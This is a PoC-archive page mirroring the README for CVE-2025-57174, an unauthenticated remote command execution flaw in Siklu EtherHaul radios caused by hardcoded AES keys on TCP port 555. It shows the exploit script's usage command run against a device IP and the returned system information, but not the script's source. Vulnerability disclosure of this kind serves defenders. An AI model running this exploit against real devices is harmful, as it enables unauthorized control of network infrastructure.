Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-57174 PoC — Ceragon EtherHaul series 安全漏洞

Source
https://github.com/semaja22/CVE-2025-57174
Associated Vulnerability
Title:Ceragon EtherHaul series 安全漏洞 (CVE-2025-57174)
Description:An issue was discovered in Siklu Communications Etherhaul 8010TX and 1200FX devices, Firmware 7.4.0 through 10.7.3 and possibly other previous versions. The rfpiped service listening on TCP port 555 which uses static AES encryption keys hardcoded in the binary. These keys are identical across all devices, allowing attackers to craft encrypted packets that execute arbitrary commands without authentication. This is a failed patch for CVE-2017-7318. This issue may affect other Etherhaul series devices with shared firmware.
Description
CVE-2025-57174 Unauthenticated Remote Command Execution
Readme
# CVE-2025-57174 - Siklu EtherHaul Series - Unauthenticated Remote Command Execution
CVE-2025-57174 Unauthenticated Remote Command Execution<br>
Affected Versions: Firmware 7.4.0 - 10.7.3 (likely all versions since 7.4.0)

How to use
```
python3 CVE-2025-57174.py 172.16.100.52 'simple-command show system' --nul --recv
Response: flag=0x00 msg=0x01 length=584
<end-code>ok</end-code><text>
system description               : EH-8010FX-L
system snmpid                    : .1.3.6.1.4.1.31926
system uptime                    : 0028:22:01:51
system contact                   : undefined
system name                      : EH-8010FX-L
system location                  : undefined
system voltage                   : poe (injector)
system temperature               : 47
system date                      : 2025.09.24
system time                      : 14:56:50
system cli-timeout               : 15
system loop-permission           : enabled
</text>
```

<img width="1420" height="772" alt="{5EB1C49C-5E07-479B-A00C-BFA12D08C721}" src="https://github.com/user-attachments/assets/c1ec87fa-ed57-4c76-83f3-61b7213fdf82" />
File Snapshot

 [4.0K]  /data/pocs/77a159a3c18b552781ed7ce00886980a7ee496e5
├── [4.2K]  CVE-2025-57174.py
└── [1.1K]  README.md

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →